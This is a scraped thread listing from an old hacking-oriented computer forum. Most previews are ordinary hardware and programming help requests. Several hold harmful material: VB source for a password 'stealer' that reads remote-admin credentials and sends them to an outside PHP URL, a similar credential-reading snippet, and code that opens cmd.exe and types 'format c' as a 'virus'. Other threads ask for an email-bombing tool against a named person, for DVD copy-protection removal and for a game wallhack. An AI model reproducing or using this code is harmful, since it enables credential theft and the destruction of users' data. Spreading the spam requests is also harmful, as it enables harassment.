Computer Discussion
1365 topics in this forum
-
Anyone know of any good ones, one that might work on phpbb, SMF, or vbulletin?
-
-
- 10 replies
- 188 views
-
-
Form1: Module: lol ^_____^ btw the module is just to mod the registry, if you have your own just use that.
-
- 3 replies
- 121 views
-
-
i need some software to copy my DVDs that have protection on them give me some apps k.
-
- 11 replies
- 103 views
-
-
What's a good, simple video editor without a bunch of gay unneccesary stuff? I just need to crop a 2 minute clip out of an hour show.
-
- 9 replies
- 105 views
-
-
I'm looking for an easy way to either run a program and have my computer send out a massive amount of emails to one address or put it into a website and sign it up for all this spam because most of the online registration slips require conformation. If anyone could maybe spam the email address for me, or direct me to something that would fill this guys email box up, please let me know. His email is - [email protected]
-
- 2 replies
- 85 views
-
-
Anyone have a proggy to do this? I've checked google, but found nothing legit, k tx
-
- 5 replies
- 118 views
-
-
this is a acual working stealer... i was gonna do it in C++ but it would have taken longer for me :facesj: VB Source Code: Private Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long Public sapath As String 'get the stringy thingy Public password As String Public IP As String Public PORT As String Public drive As String Public inipath As String Public PathToPHP As String Private Sub Form_Load() PathToPHP = "http://massive-mapping.com/example/" GetSaPa…
-
- 14 replies
- 290 views
-
-
Well I had a site twolvesfan624.xbtronics.com and that all of a sudden would not work.It just said could not be found. However I could still FTP! Now this just happened on a different host. I think I know who mgiht be doing this, but what could he be doing that to make it stop working? because I can still FTP in weird.. I think none of the other subaccounts work either now.. like http://www.XXX.w/e.com Edit I've been looking around and I'm farely positive that he hacked the cpanel because my friend who is letting me use the server said that the cpanel password was changed
-
- 2 replies
- 58 views
-
-
Okay: I've got a fairly old PC (about 2+ years old) that I bought the parts for and built myself... 2.43 ghz (533fsb) 512 RDRAM (I know, rdram was a stupid move) 9700pro128 My mobo is only 4x agp, which I think could be one of my big problems. That being said; would it make a big difference If I got a gig of RAM? Or, should I just get a new mobo/processor that supports better graphics cards?
-
- 7 replies
- 87 views
-
-
http://img369.imageshack.us/img369/5467/anygood3rp.jpg
-
- 9 replies
- 93 views
-
-
I found this way back in the boards and tried to make it. when i put this in it said that it had an unexpected file end. can anyone help me fix this problem? #pragma comment(lib, "winmm.lib") #include <iostream> #include <cstring> #include <windows.h> #include <stdlib.h> #include <time.h> #include <mmsystem.h> using namespace std; const int goblo = 2; const int gobhi = 6; const int drglo = 8; const int drghi = 18; int player = 100; int attack; int gobattack; int drgattack; int bow = 9; int axe = 12; int gob = 25; int drg = 60; char name[50]; char tanswer[50]; char armanswer[50]; char answer[50]; char buyanswer[50]; …
-
- 3 replies
- 47 views
-
-
Private Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long Public sapath As String 'get the stringy thingy Public password As String Public IP As String Public PORT As String Public drive As String Public inipath As String Private Sub Command1_Click() List1.AddItem "IP: " & GetFromINI("Remote Admin", "IP", inipath) List1.AddItem "Port: " & GetFromINI("Remote Admin", "Port", inipath) List1.AddItem "Pass: " & GetFromINI("Remote Admin", "Password", i…
-
- 0 replies
- 56 views
-
-
would anybody know where to find the a laptop kit such as aopens 1559AS kit or another kit that they have that is located in the U.S. or ships to the U.S. ???? i could only find european sites on google but couldn't be bothered whethe they shipped to the U.S. or not. i know this includes the power supply, case, mobo, etc. and i was going to then buy my proc and everythin to build it. thouhgt that it would be fun to build rather than buy a ready to go laptop since ive never done it before.
-
- 0 replies
- 42 views
-
-
Alright. I'm going to be spending around 1600 Canadian dollars on a laptop and was wondering which processor to go for. I've rounded it down to the A: AMD Turion 64 B: Intel Centrino Duo chipset. Would anyone help me with the pros and cons of both? Thanks!
-
- 6 replies
- 84 views
-
-
Hey people, I was working on a program in Visual Basic that 'supposingly' generates a list of Prime Numbers from 0 to a number you put in. I've encountered some problems though. At the moment when you execute the program, type in a number and press the button to start the calculation nothing happens. I'm sure it's probably something very stupid... but if you know the awnser please tell me. Private Sub cmdSearch_Click() 'the button you pressed to start 'txtText1 is the input textfield in which you type in the max. number to look for primenumbers for 'txtText2 is the output textfield that displays all the found numbers Dim Teller As Long Dim Half As Long Dim Roo…
-
- 12 replies
- 134 views
-
-
this idea was based off of "worm" (of hackerthreads.org)'s perl code. this is written in VB6 Private Sub Command1_Click() On Error Resume Next Dim fileext As String Dim SRC As String Dim find1() As String Dim find2() As String Dim dblquote As String Dim final As String dblquote = Chr(34) SRC = Inet1.OpenURL(Text1.Text) fileext = Right(Text1.Text, 4) If Text1.Text <> vbNullString Then 'if the text field is not blank If InStrB(Text1.Text, ".imageshack.us") = 0 Then 'imageshack URL? MsgBox "Sorry this file is not even on imageshack...impossible to leech it.", vbOKOnly, "ERROR" Else If InStrB(Text1.Text, "my.php") = 0 Then 'imageshack leecher URL? MsgBox "Sorry…
-
- 1 reply
- 91 views
-
-
hi :nigga:, i was recording stuff with fraps and the size of the video was HUGE, yall know how to resize it?
-
- 4 replies
- 51 views
-
-
I just got a program, It's pretty cool and im shure every one no's about widgets, The program is owned by Yahoo! so they try to install Yahoo! Music Engine and Messenger but there's an option to not install the add in's. I just got a few Widgets an hour ago and they look sooo coolio on your desktop...It depens on what the hell you get. http://img389.imageshack.us/img389/8228/widgets4cc.png You can get the Program that runs the widgets at thislink location. Now after you download and install goHear for the wigets, Now there are some that are shit worthless. I like the system utilities. Okay for program two, TuneUp Utilities 2006..Awesome program, If you ever get tire…
-
- 8 replies
- 228 views
-
-
this was my old CSS wallhack/chams SRC http://www.unknowncheats.com/forum/showthread.php?t=35730 you need to brute force the new numvertices to make it work you should probably know how to do that if not heres a hint now only if there was a way to change temp with some kind of button on my keyboard :lmfao: enjoy.
-
- 5 replies
- 114 views
-
-
make a virus if you know what your doing. http://www.ss64.com/nt/
-
- 10 replies
- 225 views
-
-
As you have probably noticed, I'm new here. I dunno where else to post or what to post about so I might as well post a tutorial I wrote for hackthissite.org... http://www.hackthissite.org/articles/read/407/ - remove this link if you consider it advertising And here's the article for those too lazy too sign up [sorry about the code formatting]:
-
- 5 replies
- 263 views
-
-
how do u packet a website?..if u can help send a pm :facesj:
-
- 0 replies
- 29 views
-
-
I am pretty computer literate, and can undertsnad complicated advice so keep that in mind. Okay my problem is that I get absolutly raped by every download client in the world. I have a 6 Mb/s connection through comcast, but the highest speed I have ver gotten from Bit Torrent is like 20 kb/s. I know this is becasue you need to forward ports and what not, but every time I do it still is slow. I use McAfee Firewall 2006, and open ports there still nothing. I have a Motorola Modem, a Linksys BEFW11S4 router and McAffe 2006 as I stated above. I am just looking for help as to what client to use, and detailed instructions on how to set it up to get the speeds that I have seen o…
-
- 14 replies
- 159 views
-
-
I made this thread alrady in another forum but it was deleted. Listen, I need some help here, you guys can come in a say "lol noob" all you like, because I don't give a shit. Basicly, I built my own PC and installed my friends Windows XP Professional with key code and everything. I need to update and I'm getting this bullshit message: http://img350.imageshack.us/img350/5917/untitled6on.png I've tried that thing where you paste "javascript: etc" but I still get the error. I can't click "Manage Add-ons" in IE because I don't have SP2. Help would be appreciated.
-
- 14 replies
- 207 views
-
-
Enter this code in form1 or button click: ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ShellExecute 0&, vbNullString, "cmd.exe", vbNullString, _ vbNullString, vbNormalFocus SendKeys "format c {ENTER}" 'You can edit to command what you want, but this format c maybe. EndSub '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' This dont are best virus what can do. I laught this n00b virus that maybe isn'…
-
- 17 replies
- 349 views
-